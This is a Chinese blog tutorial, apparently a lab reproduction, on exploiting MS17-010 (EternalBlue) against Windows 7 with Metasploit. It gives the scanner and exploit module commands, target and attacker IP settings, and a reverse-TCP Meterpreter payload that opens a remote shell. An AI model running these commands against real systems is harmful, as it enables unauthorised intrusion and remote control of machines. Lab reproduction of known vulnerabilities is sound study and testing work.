MS17_010漏洞攻击Windows7

Posted hunter-01001100

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了MS17_010漏洞攻击Windows7相关的知识,希望对你有一定的参考价值。

攻击主机系统:Kali Linux 2018

目标主机系统:Windows7 x64

技术图片

 

 

1.攻击主机启动Metasploit:

 msfconsole 

技术图片

 

 2.查找MS17_010漏洞相关的信息:

 search ms17_010 

一次查找不到就多查找几次

技术图片

 

 3.扫描到四个模块

模块二:探测主机是否存在MS17_010漏洞

模块三:漏洞利用

使用模块二来探测MS17_010漏洞

 use auxiliary/scanner/smb/smb_ms17_010 

技术图片

 

 4.设置想要探测的目标主机的ip或者ip范围(如果单个ip就设置一个ip就可以了,这里我们演示扫ip范围)

 set RHOSTS 192.168.48.125-192.168.48.135 

技术图片

 

5. 启动探测

 exploit

回显[+]二不是[*]的就为存在该漏洞的主机

技术图片

 

 6.探测到了目标主机后,启动漏洞利用模块

 use exploit/windows/smb/ms17_010_eternalblue 

技术图片

 

 7.查看需要设置的参数

 show options 

技术图片

 

 8.查看payloads:

 show payloads 

技术图片

 

 9.设置payload:

 set payload windows/x64/meterpreter/reverse_tcp 

技术图片

 

 10.设定目标主机:

 set RHOST 192.168.48.130 

技术图片

 

 11.设定攻击主机:

 set LHOST 192.168.48.131 

技术图片

 

12. 开始攻击:

 exploit 或者 run 

技术图片

 

13. 攻击成功,使用meterpreter模块开始控制目标主机

技术图片

 

 14.查看目标主机的信息:

 sysinfo 

技术图片

 

 

 

[Meterpreter命令详解]

以上是关于MS17_010漏洞攻击Windows7的主要内容,如果未能解决你的问题,请参考以下文章

永恒之蓝漏洞复现(ms17-010)

MS17-010永恒之蓝漏洞利用

ms17010漏洞利用msf 2019-03-27 ms070-

ms17-010漏洞利用教程

MSF利用ms17_010实验

基于Armitage的MSF自动化漏洞攻击实践